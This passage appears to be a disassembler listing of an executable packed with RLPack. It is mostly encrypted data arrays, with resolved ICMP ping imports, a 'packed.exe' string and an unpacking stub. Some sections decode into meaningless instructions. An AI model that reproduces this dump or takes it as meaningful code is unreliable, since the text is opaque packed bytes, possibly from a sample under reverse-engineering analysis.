dword_41E338 dd 76BF21C2h ; sub_405FA3+8C�r ...
dword_41E33C dd 76BF3A9Ah ; sub_405FA3+71�r ...
dword_41E340 dd 14A288h, 0FFFFFFFFh, 5 dup(0) ; sub_406041+B�o ...
byte_41E35C db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E360 dd 0 ; sub_409226+77�w ...
align 8
dword_41E368 dd 14A2B0h, 0FFFFFFFFh, 4 dup(0) ; sub_4095A4+6�o ...
dword_41E380 dd 0 ; sub_4095A4+11�r ...
align 8
dword_41E388 dd 344FC0h ; sub_4095A4+57�r ...
dword_41E38C dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_409DD0+65�w ...
dword_41E390 dd 0 ; sub_409DD0+44�r ...
dword_41E394 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_409DD0+91�w ...
dword_41E398 dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_409DD0+7B�w ...
align 10h
byte_41E3A0 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E7A8 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E928 dd 40h dup(0) ; sub_40CF2F+A6�o ...
dword_41EA28 dd 3 dup(0) ; sub_40CF2F+36�o ...
dword_41EA34 dd 0 ; sub_40D366+15�r ...
dd 0
dword_41EA3C dd 0 ; sub_40E618:loc_40E66D�w
byte_41EA40 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EB44 db 0C9h ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
db 0BEh, 0CAh, 5Dh
dd 4AE9ABB7h, 8BBE095Eh, 0A29702B7h, 0
dword_41EB58 dd 331BFB1h, 71A181E9h, 7BBFD1C3h, 7F0B57E9h, 0 ; sub_40ED6E+35�o ...
dword_41EB6C dd 783B72B6h ; sub_410318+7�w ...
dword_41EB70 dd 0B3B0891Ch ; sub_410318+11�w ...
dword_41EB74 dd 9D889CBFh ; sub_410318+1B�w ...
dword_41EB78 dd 5C08BAEBh ; sub_410318+25�w ...
align 10h
byte_41EB80 db 0F2h ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
; ---------------------------------------------------------------------------
cmc
mov dl, 0ABh
fsubp st(2), st
cli
xchg eax, edx
retf
; ---------------------------------------------------------------------------
retn 97F5h
; ---------------------------------------------------------------------------
dd 95AF81DEh, 2 dup(0)
dword_41EB98 dd 2 dup(0) dword_41EBA0 dd 0 dword_41EBA4 dd 2 dup(0) dword_41EBAC dd 0 ; sub_4127D0+16�w
dword_41EBB0 dd 0 ; sub_4127D0:loc_4128A0�r
dword_41EBB4 dd 2 dup(0) ; sub_412E04+7F�o
dword_41EBBC dd 6B636170h, 652E6465h, 6578h, 3Eh dup(0) ; sub_407148+172�o ...
dword_41ECC0 dd 2E4436DEh ; .packed:00416909�w
dword_41ECC4 dd 0E3033F00h dword_41ECC8 dd 60E5AD04h dword_41ECCC dd 2919B518h dword_41ECD0 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; sub_40A9CF+C51�o ...
dword_41EDD8 dd 40h dup(0) ; sub_40A9CF+108E�o ...
byte_41EED8 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EF58 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41EFD8 dd 40h dup(0) ; sub_4055E5+746�o ...
byte_41F0D8 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 4
dd 3C9h dup(0)
dd 69A2h, 7FA4h, 2 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 77C1C1F3h, 0
dd 71AB406Ah, 0
dd 7E41BE4Bh, 0
dd 77DECF4Ah, 0
dd 7CA41110h, 0
dd 7712A63Fh, 0
dd 20010h, 0
dd 0FFFFFFFFh, 200F4h, 20010h, 20024h, 0
dd 0FFFFFFFFh, 20148h, 20024h, 2002Ch, 0
dd 0FFFFFFFFh, 20160h, 2002Ch, 20034h, 0
dd 0FFFFFFFFh, 2016Ch, 20034h, 2003Ch, 0
dd 0FFFFFFFFh, 20190h, 2003Ch, 20044h, 0
dd 0FFFFFFFFh, 201B4h, 20044h, 2004Ch, 0
dd 0FFFFFFFFh, 201D4h, 2004Ch, 2Dh dup(0)
db 0
byte_420195 db 3 dup(0) ; CODE XREF: .packed:00420210�j
dd 0Dh dup(0)
db 2 dup(0)
word_4201CE dw 0 ; CODE XREF: .packed:0042022E�j
dd 4 dup(0)
dd 1CCD800h, 200h, 2A000002h, 0CE54F2A3h, 22CEC081h, 1E3CB2DCh
dd 0CA8AFB54h, 889B41C5h, 723AAE45h, 148E108h, 7F730E9h
db 0Ah
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
jb short near ptr byte_420195
jnz short near ptr loc_420247+1
cmp al, 45h
or [ecx], bh
dec eax
stc
cmp [ebp-10h], ah
db 67h
or al, bh
add [ebx], dh
rol byte ptr [edx+53h], cl ; CODE XREF: .packed:00420255�j
pop es
push esi
mov esi, [eax+0Ch]
push edi
inc ecx
fcmovbe st, st(3)
jecxz short near ptr word_4201CE
xor [eax+edi*8], al
jge short loc_4202AE
loc_420235: ; CODE XREF: .packed:loc_420247�j
cli
add edi, esp
mov [ebp-2Ch], eax
add ecx, eax
mov eax, 0F868A6C3h
loc_420242: ; CODE XREF: .packed:0042025C�j
loopne loc_420283
dec ebx
dec edi
push es
loc_420247: ; CODE XREF: .packed:00420212�j
jnz short loc_420235
add eax, 0C61C8136h
inc ebp
or edi, [esi]
pop ds
pop ebp
ror dh, 1
jge short near ptr loc_420222+1
mov byte ptr [ebp-18h], 6
inc eax
loopne loc_420242
sbb ah, 74h
xor cl, [ebx]
mov edx, [edi+4]
push cs
loc_420267: ; CODE XREF: .packed:loc_420267�j
jecxz short loc_420267
rep stosd
aaa
mov edx, 63EAC0Ch
push 5
test [ecx-4], bh
pop es
enter 59FFh, 8Bh ; CODE XREF: .packed:0042028E�j
jnz short near ptr loc_4202FA+1
pusha
push ebp
or al, 0Fh
mov dh, 36h
loc_420283: ; CODE XREF: .packed:loc_420242�j
add eax, ecx
loop near ptr loc_42028E+1
or edx, esi
push dword ptr [edi]
sub cl, [ecx+64h]
loc_42028E: ; CODE XREF: .packed:00420285�j
lock jnz short near ptr loc_420277+3
cmp [ebp+3Bh], ecx
sbb [edi-80h], dh
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 0B3F5h
; ---------------------------------------------------------------------------
dd 9B23A872h, 0F84DB1F0h, 0C1EC5680h
db 0E1h
byte_4202AD db 4 ; CODE XREF: .packed:004202C5�j
; ---------------------------------------------------------------------------
loc_4202AE: ; CODE XREF: .packed:00420233�j
add ecx, ebx
or cl, [ebp-4AC275C4h]
xchg al, [ecx]
jnb short loc_4202D1
and al, 0C8h
or byte ptr [ebp-65h], 12h
xor [edx], bh
or dl, 0BAh
loopne near ptr byte_4202AD
xchg ecx, [ecx+0F8B3922h]
db 3Eh
lock popf
out dx, al
loc_4202D1: ; CODE XREF: .packed:004202B8�j
or eax, [ebx+7539F1AFh]
or al, 3Ch
cmp dword ptr [edi+1], 0FFFFFFFDh
mov byte ptr [eax-42h], 0A8h
out dx, al
sub esi, ecx
mov dword ptr [eax], 89530305h
aaa
sub [eax+75h], ch
cdq
sub dword ptr [edx+6AF0CC23h], 2A590805h
dec ebp
loc_4202FA: ; CODE XREF: .packed:0042027B�j
aam 6
jmp near ptr 0EFD8F1D4h
; ---------------------------------------------------------------------------
db 46h, 0DCh, 0Ah
dd 342EC03h, 85F669F7h, 2A714h, 8D07F87Dh, 6CD80E8Ch, 8AC161Ch
dd 9F6C0F7Ah, 7CF040EDh, 0B9E8502Bh, 0C84C614h, 0F41C2C31h
dd 90F665D1h, 8750E06h, 0D118E781h, 17670C8Dh, 4048E64h
dd 0A694D822h, 88755D40h, 0E640C11Bh, 75408EF3h, 738A8709h
dd 3AF3A21Fh, 0D281D8CEh, 0FF853189h, 8682CD0Fh, 2919EB8Dh
dd 0C62B1448h, 60771D8Bh, 89D89CCEh, 54188D0Eh, 743E0112h
dd 0FA812867h, 739D8178h, 0EB0219F3h, 20087061h, 1185911Fh
dd 44368875h, 73123ECEh, 621B2A14h, 9C12EBF0h, 0F89286Eh
dd 3267846Bh, 0F0A89F7Ch, 0ED921406h, 1C041D24h, 0FE0B5588h
dd 9A60E3Ch, 9AE9412Bh, 33322305h, 0FB6D1F0Ah, 138BFA03h
dd 0A206123Ch, 8BA1C182h, 92EAC1D1h, 0C55BCA9Ch, 0CFA654B4h
dd 8A94268Dh, 0FEAC4843h, 43880A46h, 7DD33F3h, 4E32E46Ah
dd 0FE00CDCh, 37784830h, 7DB21032h, 0EB919006h, 45C72807h
dd 9B3A688h, 0C8C181ECh, 0F3E9D022h, 0D9DBC3A8h, 657360Ah
dd 308ABC8Dh, 56569155h, 11C3D051h, 3439D18Bh, 0AB6A83B4h
dd 0F8F0B25Bh, 9A0FF283h, 442A2A1h, 0A6C7ECCCh, 348DC250h
dd 8936908Eh, 0A1A41953h, 0B726B6E3h, 5586588Ch, 73C60E43h
dd 0BA554447h, 32C4853h, 0C0E044EBh, 0F168986h, 3F51842Ch
dd 48145542h, 0A4C9337Bh, 9D0F03F4h, 94C8DC1h, 36F77E8Eh
dd 8A8E548Eh, 88110C1Fh, 0C3B8DE4h, 5B13E916h, 2B98C429h
dd 20719DC2h, 0E070E92Ah, 0F22213ADh, 601082A5h, 0A71526FFh
dd 3278A054h, 547A48EBh, 90BA90EDh, 91E488AAh, 4955F217h
dd 5975DCE7h, 0FF62E6E6h, 4516B76h, 493C1A4Bh, 0FBFDE11Eh
dd 6A1D0B24h, 14D08AF8h, 6EC7DA84h, 55908423h, 0F2901123h
dd 0F4532588h, 0E35C0A26h, 6D3124ACh, 33080B02h, 0AC4E63FFh
dd 0C281E921h, 0F2104565h, 1189D682h, 0BFA860BDh, 26106187h
dd 45C71B8h, 2C46634h, 868CB028h, 1EEB2965h, 384ED62h
dd 41A608C9h, 26E61045h, 0CDF1D25Fh, 0D8FB535Dh, 1F42211h
dd 3BF78347h, 9114A282h, 194786B4h, 0C9C8439Ah, 911B3489h
dd 47F31CEBh, 0A46C7CB5h, 0B15C142Eh, 1361B02h, 0E3FFD290h
dd 0EA95FA96h, 0C0175063h, 2BE6D33Eh, 0FBB801FEh, 222C08B1h
dd 7A856E15h, 7676FB0h, 6DEEF41Ch, 0EBD84605h, 786A7203h
dd 0B228FD59h, 9C049158h, 1106C039h, 150C69BBh, 93496E11h
dd 0A1A012B7h, 229E935Dh, 39B5D216h, 0A268AC15h, 8009D48h
dd 0EA83A275h, 90FAE640h, 0FDA0D70h, 0E0D1D28Ch, 0F97FD1CAh
dd 1301E326h, 2C02CB0Ch, 0D8BEC20Eh, 0C7580F7Dh, 400261FBh
dd 0ABC8F70h, 1243EB80h, 7E04E983h, 0E8D1033Bh, 0D739DB03h
dd 29067271h, 968E0AB6h, 8DD07505h, 4CD5888Fh, 0D104B80Ah
dd 9022D81Dh, 0B447671Ah, 0E87D3208h, 14E2844Fh, 11814DB9h
dd 0DA0EE415h, 0EBFFA2B9h, 72C11219h, 0D1D542E9h, 0E104664Ah
dd 6EE3960Bh, 3F7C8D09h, 529E0F01h, 439C7D20h, 726D689h
dd 0DFF8E011h, 710E54D7h, 3B02F401h, 213577DEh, 0CE1C600Dh
dd 3CB2B03h, 1F118ACFh, 4488F44Ah, 9741463Eh, 9E410988h
dd 744A8789h, 18513B05h, 0A0BAE572h, 18FD39B9h, 77AE820Fh
dd 0BC3A0E9h, 0C340C033h, 22114B9Ah, 0E67010F7h, 0B4087528h
dd 57044600h, 59096A99h, 3CF975F7h, 707C5F05h, 5104B68h
dd 6C0B65Ah, 0E0F79993h, 0E7A17D7Dh, 0E442CEF0h, 0A27A4C3h
dd 960094F4h, 7E548FBh, 26A5004h, 946157FFh, 0FC388E1Eh
dd 3E3F7E8Dh, 83CAD053h, 0AE09C636h, 37F07D1Ah, 1C7EA1E8h
dd 5183809Ah, 50811E4Bh, 8B5E5F0Ch, 55DD38C3h, 2D50C148h
dd 40547058h, 6767F104h, 10AA018h, 15FE4C53h, 0AE741438h
dd 0DCD83110h, 1088440h, 19E273C8h, 0C1254905h, 0C202FDE1h
dd 38806316h, 8147E31h, 900F5EA7h, 410B041Ah, 841037A6h
dd 30706370h, 8146FE7h, 0AC1C0E4Ah, 324CA410h, 0CCD19DC3h
dd 891B1E0Dh, 5F296842h, 79832078h, 0D038AE99h, 0F3F7018Dh
dd 738499E8h, 53090BDCh, 0A4885657h, 815D010Dh, 86134CEDh
dd 43B58D8Ch, 468B000Dh, 4C083FCh, 0E5EDF02Bh, 2056EDDEh
dd 1C4C7637h, 0BD8D0603h, 29321F2Fh, 2ABADh, 487B8390h
dd 26987401h, 8544730Eh, 0B90EE3F6h, 0A7834D23h, 47407B1Dh
dd 7EA4F3FAh, 111B5879h, 6FC82F01h, 1F06D304h, 1EFFCC61h
dd 0E82A511Ch, 90539E46h, 4E8B0101h, 2B8D892Ch, 406A4B89h
dd 2451C719h, 3761957Bh, 27858921h, 0E8560D84h, 72BF96F6h
dd 1C1DBD20h, 0DB0FC085h, 2822C194h, 550CCA40h, 19094D1h
dd 34139AF6h, 770AC985h, 664F8589h, 20465108h, 6EC00647h
dd 958B7B74h, 0CD1A54AAh, 0DAE6C8Dh, 8AA97544h, 2DEB103Ah
dd 57C163F7h, 52E07480h, 979EE181h, 8D517F01h, 31980785h
dd 1F3F0E50h, 4C89058Ah, 0B1D2609h, 0C8ED0305h, 3E528B41h
dd 0A6C2D23Fh, 6A0D8196h, 0AB85108Ah, 9AC0211Ch, 8043148h
dd 500C54EBh, 2591DE37h, 432C7510h, 404B0B36h, 0F7030E80h
dd 0E91606C6h, 3E1CC183h, 0B1489D2h, 90C24625h, 7F214B3h
dd 0E357A3D6h, 90194837h, 0F44B5A2h, 0D13BA6CEh, 30C4600h
dd 5F5E5DC7h, 15C35B2Ch, 49FCC442h, 20C2E8BBh, 6EB815Bh
dd 0E03F1568h, 30E8139h, 93FF51CBh, 0E949A922h, 6A60BA51h
dd 0D3C3A17Eh, 4D61FBC9h, 3F7402D8h, 0FA755216h, 0E2504CC3h
dd 45339386h, 835AAB01h, 0E4EB04C2h, 0AC860761h, 0AFC57506h
dd 831EC968h, 0A2D70123h, 25CD8AD0h, 8C266C1h, 0AD9EE910h
dd 3F07BD24h, 8905C203h, 32F4EB08h, 0D2350C99h, 0FE85699h
dd 0D4165C10h, 0C94C723Eh, 743C0B58h, 0FE0B110Ah, 24503020h
dd 0E02E07EBh, 0FF85589h, 1046B70Bh, 756410A9h, 8A08EE7Dh
dd 8490874Ch, 6C587AABh, 40FC3192h, 36F0125Eh, 0F8750303h
dd 347DCF3Bh, 704606C9h, 107D0B0h, 0E82CFC55h, 0E874D3B3h
dd 188AC8FEh, 2A1C75D7h, 0DECC23Ah, 0E8C1660Eh, 10C06108h
dd 1E34C486h, 7015F06h, 3F04C680h, 0EB41C15Ch, 24595EC8h
dd 140D46BEh, 2A3B3574h, 0AB6230D5h, 5316F784h, 78E91F30h
dd 0D5ABCFDh, 428E5117h, 3440F839h, 23FEC83h, 12768B66h
dd 0A7D68252h, 8E5906FEh, 3F491C2Ch, 0E6515713h, 0ACE5D0B3h
dd 0F7174741h, 0B927A9EFh, 0CD42DE50h, 10ED8B43h, 0C94D7450h
dd 5E8673E0h, 4B2C287Dh, 0C19CF808h, 0F302F942h, 832DC0A5h
dd 0FF64FBE1h, 1604507Bh, 52A4CFFAh, 1F19D16Ah, 84CA10ABh
dd 7BB45AAAh, 3D32DA3Bh, 0A6813234h, 0A27501C3h, 0E388A25Ah
dd 809C2255h, 0C102479Ah, 5251F00Eh, 72912356h, 0D6918A91h
dd 0A6BB8950h, 0EC7D2EBFh, 76E3526h, 85C82B48h, 26B22A36h
dd 315F205Eh, 2C03047Ch, 98BB515Dh, 0F40E48D0h, 7D4BB252h
dd 0A84B5C08h, 0C72F8B86h, 0D91E516Fh, 0D0D9EC06h, 7140C8F8h
dd 0DDB59274h, 2912D446h, 369F1541h, 66EFB8Fh, 5ACAEBC2h
dd 900F1B6Bh, 8C7D3BFAh, 28F90E75h, 0F3DA11EBh, 0C7C14027h
dd 0A40FFF05h, 0C1C10AAh, 2BDFE0DCh, 492E9C75h, 93F35E38h
dd 6A0B91DAh, 2DED0840h, 0B3402D24h, 1A3FDCBh, 9B14CB5Fh
dd 822476B4h, 5C143993h, 60D75B6h, 8032474h, 6043A2CFh
dd 0F50C4E51h, 197ECE34h, 21FF8510h, 5750E87Bh, 0E8535109h
dd 412DEA1Fh, 8823481Bh, 0A920E177h, 0C5EB2714h, 736D7338h
dd 75627639h, 0C770E499h, 0C45881Ah, 0AD838925h, 1090D0B1h
dd 46F687AEh
dd 0EF938B11h, 1C4E4E2Ch, 27D2D6AFh, 59C8E983h, 30B8C085h
dd 0EB684E73h, 1044634Eh, 19F4EB8Eh, 407DCEC9h, 851455B1h
dd 27DD27Ah, 0F662D676h, 0A8C7F20Dh, 9F4F8A6Eh, 4474B8B0h
dd 4E7FA452h, 92521A9h, 38233925h, 0EEB166Ah, 4103F481h
dd 0F366D674h, 0E34051E0h, 1FC8492Ch, 61685A9Ah, 4DAC6F6Ch
dd 22539B9h, 0BB22548Bh, 9D88ACEBh, 84AED59Ch, 5E15FC51h
dd 1F3D76Fh, 0F12B302Ah, 0E8D0B489h, 121C12A4h, 20C4D3Bh
dd 0F3EB4166h, 6B9836BEh, 0D26DFC49h, 20841ACAh, 0B681571Ch
dd 0B9483C40h, 8D140048h, 8318017Ch, 0CFF427C7h, 60E9C12Ch
dd 51CCE11Ch, 0B650768Dh, 3A60C94Bh, 8A801EFBh, 0F6A85007h
dd 782C7404h, 1D595188h, 1E39E714h, 6590A563h, 292B85B2h
dd 857A660Dh, 32A7E422h, 3325A40Ch, 0AF97FE29h, 4A9ACF10h
dd 0B2807B72h, 8068B88Dh, 5DEAB2Dh, 8934568Bh, 4CA66F17h
dd 41F1AE48h, 696CC470h, 7461631Dh, 206E6F01h, 0B7C77265h
dd 0E712143Eh, 75C5207Dh, 802EDBFFh, 0FB656854h, 633C3BE3h
dd 0C6F6643Fh, 35732514h, 0E5F96CF2h, 0F574D96Eh, 0BBAF0762h
dd 6E367F61h, 53F86469h, 0A1E34C44h, 82333547h, 612C1B64h
dd 2BBD206Ch, 92ACE33h, 63272757h, 8A48CD4Bh, 0E9B7375h
dd 4D0E3233h, 619E3CDEh, 6F42C367h, 77834178h, 788F18DDh
dd 14CD6674h, 9BE3386Bh, 453F026Ch, 50746978h, 4C70A493h
dd 68C0436Ch, 6E611E48h, 3D703F64h, 0AC78704Fh, 3D477F18h
dd 0C4504D74h, 0C11CA66Ch, 7269567Ch, 0A08DFE74h, 638E0341h
dd 8A9A9BD4h, 9A999376h, 8E128209h, 0A37DAB25h, 6D33010Eh
dd 922D339h, 3C5044EBh, 304C4889h, 63499A7Ah, 19A5099Ch
dd 0BB018142h, 8B6000B6h, 8B242474h, 0FC28247Ch, 0DB3380B2h
dd 0E802B3A4h, 6Dh, 0C933F673h, 64E8h, 331C7300h, 5BE8C0h
dd 23730000h, 0B04102B3h, 4FE810h, 0C0120000h, 3F75F773h
dd 0E8D4EBAAh, 4Dh, 1075CB2Bh, 42E8h, 0AC28EB00h, 4D74E8D1h
dd 1CEBC913h, 0E0C14891h, 2CE8AC08h, 3D000000h, 7D00h
dd 0FC800A73h, 83067305h, 2777FF8h, 8B954141h, 5601B3C5h
dd 0F02BF78Bh, 0EB5EA4F3h, 75D2028Eh, 46168A05h, 33C3D212h
dd 0EEE841C9h, 13FFFFFFh, 0FFE7E8C9h, 0F272FFFFh, 247C2BC3h
dd 247C8928h, 0CC2611Ch, 0
dd 20204h, 1660h, 964h, 20CEAh, 20018h, 2001Ch, 400000h
dd 7C801D77h, 7C80ADA0h, 41FB41B8h, 9E888DF0h, 89100012h
dd 548B0141h, 528B0424h, 0E902C60Ch, 2B05C283h, 0FC4A89CAh
dd 0B8C3C033h, 0F041FB41h, 58F64h, 83000000h, 535504C4h
dd 52565751h, 1257988Dh, 538B1000h, 0E88B5218h, 68406Ah
dd 0FF000010h, 6A0473h, 3104B8Bh, 0FF018BCAh, 0F88B5AD0h
dd 338B5250h, 320438Bh, 89088BC2h, 438B204Bh, 8BC2031Ch
dd 1C4B8908h, 4B8BF203h, 8DCA030Ch, 57501C43h, 5AD1FF56h
dd 8430358h, 8B52F88Bh, 0FC468BF0h, 2B04C083h, 85689F0h
dd 890C4B8Bh, 0D7FF144Eh, 133F8589h, 0F08B1000h, 5A144B8Bh
dd 0CA030CEBh, 800068h, 57006A00h, 0C68B11FFh, 595F5E5Ah
dd 0E0FF5D5Bh, 4167F1h, 45Fh dup(0)
_packed ends
; Section 2. (virtual address 00022000)
; Virtual size : 00013265 ( 78437.)
; Section size in file : 00013265 ( 78437.)
; Offset to raw data for section: 00022000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_RLPack segment para public 'CODE' use32
assume cs:_RLPack
;org 422000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
dd 0DBC1CB8h, 64500342h, 38635FFh, 257089EEh, 0F0C03388h
dd 45500008h, 706D6F43h, 74386361h, 0AE3A0032h, 0EE35E45Bh
dd 92CF00ADh, 0AC712482h, 0E300E6B1h, 4193839Ch, 77D50h
dd 0CAFA34BEh, 22AB5933h, 0CC308E00h, 0CD254BA3h, 0EFFE3BB2h
dd 6B5C2B80h, 4FAA36BBh, 7AE95500h, 3D766F77h, 90A1035Ah
dd 2D67C2DEh, 0CD0436A0h, 51AFF700h, 0B8E3CF8Ah, 0EB42031Fh
dd 8C5B98BDh, 0F8C036FBh, 0CE00844Bh, 1290E230h, 0EC51E69Fh
dd 8FFC000Dh, 86D388EAh, 4C0EDCBEh, 0E0E54727h, 0F1FE3903h
dd 9FAD01BBh, 37333E9Bh, 9EEBE02Eh, 0BD86C600h, 0A60625DFh
dd 381F00BCh, 0DECAFE50h, 8F00BFC3h, 1C879761h, 767FE0C9h
dd 7EDFA0Fh, 0F225F99Fh, 79E26069h, 6F030BE3h, 85864352h
dd 660E709h, 0DD8239h, 0D35B7EE9h, 0B0DFF134h, 622C5300h
dd 446CD140h, 0AC3D0084h, 0D9319121h, 0BB00CD77h, 3667120Dh
dd 2D1E1Fh, 3D96A97Ch, 0CF8C4E89h, 0C833B600h, 0BBDACBA5h
dd 0A37D1C54h, 57B7C0B4h, 0BC3E4291h, 7D94203Ch, 92123C00h
dd 0F2A01A2Ch, 0DE08Ah, 0E8F94077h, 6466CDABh, 16BA5C1Fh
dd 0B700EB2Ah, 60B830E9h, 1B5E86h, 68949FC8h, 0DBF38935h
dd 0A2095A00h, 4CC71611h, 31591D0Ch, 0AA22C012h, 398EBA4Eh
dd 0C0AC8400h, 0DF6F68E0h, 0B2B9608Fh, 0FD7F312Ah, 0CC54A003h
dd 0EF0D0E04h, 0FEA5F6B0h, 0F1780085h, 0E83BA6C9h, 600E6C3h
dd 2C7BEB91h, 0F96DE0Fh, 85A50D46h, 0C66B5900h, 0B80ED2D3h
dd 0C0F08058h, 0FD5DD8C9h, 0C46600BCh, 4CE1719Bh, 0E800F3BBh
dd 0B74B84B4h, 0E68E74F8h, 0CA55002Ah, 2B6C90C7h, 2C1F0E89h
dd 944027C9h, 5C458747h, 0D9E2E3h, 79BC91A8h, 0CAB7AC3Eh
dd 6E0EDF00h, 3A075335h, 2D69008Ah, 0C440608Eh, 2B00E5C5h
dd 3E3997DCh, 791F5514h, 6C79006Dh, 0CE43C82Ah, 3B00B269h
dd 0D90957CDh, 844925h, 0E3DDA768h, 75B603AEh, 0F609100h
dd 896F0E93h, 6F4FD29h, 9CEC0395h, 83A869Fh, 8CD87FE0h
dd 0FFBD7607h, 68A02B19h, 0F7EDFDh, 403B6281h, 57FADE73h
dd 3D242471h, 41006728h, 0FCF34B76h, 0EAF00786h, 500FDCF2h
dd 9C0429A9h, 0F741D400h, 0DA08AE44h, 1117FF5h, 0BDD22E95h
dd 0E42DF1E6h, 0BF46D78h, 0F8B93D00h, 12E2F692h, 0C1353B73h
dd 0BB1C9148h, 0F5EDC0DFh, 0CBF71FCEh, 5149B403h, 0F32C1053h
dd 0BFECE82Dh, 0FCE0007Eh, 7C908575h, 0C7075504h, 0DDF7C1ACh
dd 31C0CB60h, 0BA78C06Fh, 76013253h, 0CAB69403h, 0F4B345AFh
dd 2CD12880h, 398A007Ah, 464C4D1Ch, 420017B2h, 0BDF66431h
dd 0D28412h, 91431680h, 0EEEF1340h, 2DC73507h, 0D43046F2h
dd 3319B54h, 4F4CDBBDh, 5A88E1F9h, 9A005E59h, 22E01C1Fh
dd 58E266h, 8FC6297Ah, 1218A574h, 84802A00h, 889CC399h
dd 24CD0057h, 86B1387Eh, 0B0003AC6h, 0CAAF6DDFh, 2550A3h
dd 0E818B9D3h, 260BD82Fh, 0FECB8A00h, 35516CFh, 569F0094h
dd 0FA0E1FA6h, 0CD712ADCh, 9D8A4100h, 85EA8629h, 657C00C0h
dd 8C1BE161h, 0D000258h, 0CC671584h, 73353DA8h, 0C5D00D2h
dd 0E2C78EEh, 0A7003BD8h, 0A585670Ah, 0F576013h, 75494693h
dd 125C14A0h, 0CA032E21h, 0FB33489Ah, 25B0979Dh, 10234F0h
dd 7813EA92h, 0FA221C93h, 3DDF3B40h, 7E3C2E00h, 0B5D49B11h
dd 7DFEF2DCh, 83AE0077h, 22EE0BB9h, 0AF003FBDh, 0E015B0A1h
dd 0F49D821h, 0C881DF16h, 4A8C7EE0h, 56FEEF25h, 0D4F748h
dd 0A4B75DF4h, 0B1855Eh, 0E6AA7366h, 0F9E39423h, 0DA827900h
dd 0F1A2429Bh, 74907C2h, 70A7CA75h, 281A43B5h, 0D20F6C00h
dd 70DCCF98h, 6C100BCh, 0F9D44CF4h, 6076494Fh, 0E8674E00h
dd 0F26916AFh, 0DEEE00DAh, 7AB53BCEh, 430FEC26h, 0A0B95AB7h
dd 505C7DD7h, 4D5F0142h, 39EBFF30h, 26BE0E8h, 3D3EC300h
dd 0CF99D7A6h, 0C44B0710h, 0C7739674h, 4D441045h, 2D00D678h
dd 5BFC2ACBh, 72D7F6h, 337769FAh, 6DE1E9AFh, 9CDA8900h
dd 678F45ECh, 4A0207D5h, 40C3284Ch, 832EA2Ch, 14E25F00h
dd 25683566h, 0D6F8001Eh, 0F79016B7h, 9A1FE810h, 0C5C0E072h
dd 0FD519189h, 0C7860011h, 7DB6A53Bh, 83F2CF09h, 0F48A3203h
dd 0F83F022Fh, 7E40173h, 317E78ADh, 6BBB502Eh, 580090AFh
dd 0B8B34D46h, 3B791713h, 240396E0h, 0ECC81DA7h, 2BCAD7A8h
dd 8F5BB000h, 38BF353Bh, 0D38100EDh, 5D948BD9h, 0C21492B9h
dd 0E96D45h, 0F0513D46h, 0FC85ACh, 0DDAB7280h, 785B118Eh
dd 0D61F4CE8h, 0E6405AEEh, 2BC1AAA9h, 92760039h, 9DF978B4h
dd 5B0016F5h, 48CC5DD6h, 84551h, 0F19C8C04h, 76E487A1h
dd 641EF67Ch, 4D83D09Bh, 0A0857410h, 717C36AAh, 25340093h
dd 0EC753F71h, 0F13CCC8Eh, 11BF8056h, 23798CB2h, 73D800E4h
dd 3A740272h, 0A600EB17h, 590D759Eh, 79D8E8Bh, 0B1D67047h
dd 9B8CC0F3h, 84005CD9h, 0F5E5A297h, 464845h, 0F19DEF9h
dd 90241A5Fh, 2EBD7E00h, 0CB3A7667h, 4FCD009Eh, 9C68B4E9h
dd 26009D35h, 489BB331h, 7575BBDCh, 0F010005Fh, 599054F3h
dd 0EC00F9F1h, 3867AAE1h, 413E6Fh, 8615E7F5h, 784B3BE4h
dd 0D53A030Fh, 4011010Eh, 0D430834Dh, 61B0037h, 4665A06Fh
dd 23AD322h, 5E018021h, 30A1475Ah, 727F42Ah, 2C15BDACh
dd 0BA4AD039h, 0EA00E6D7h, 0C42387E0h, 1E91CFh, 0AD25FE1Bh
dd 2F7D1F6h, 0A9E36000h, 0C212F98h, 873200D8h, 0A2A3C21Dh
dd 6A005BB2h, 0FDC966AAh, 726D1380h, 0C86100D9h, 56DF3A4Eh
dd 0BC2CE2A7h, 0A400C15Eh, 21B15D57h, 0E6D30729h, 403A231Bh
dd 2B647153h, 0B7E4B900h, 18BC8835h, 0DB7000ADh, 0BF3072EFh
dd 5C00548Bh, 38C05002h, 1EC7618Eh, 0FF97E5F9h, 0FC1000F0h
dd 457A4FC1h, 173E7306h, 0A4C300A0h, 0BEE0868Eh, 9C43003Ch
dd 5521F51Eh, 54007B39h, 4C03425Eh, 14F370h, 90438FC5h
dd 10EE11A1h, 1FC48E0Eh, 2F1C6065h, 1DE8922h, 47A77DE6h
dd 0DAF429A8h, 0FCCD0040h, 0B83C400h, 27E93230h, 7FF6E079h
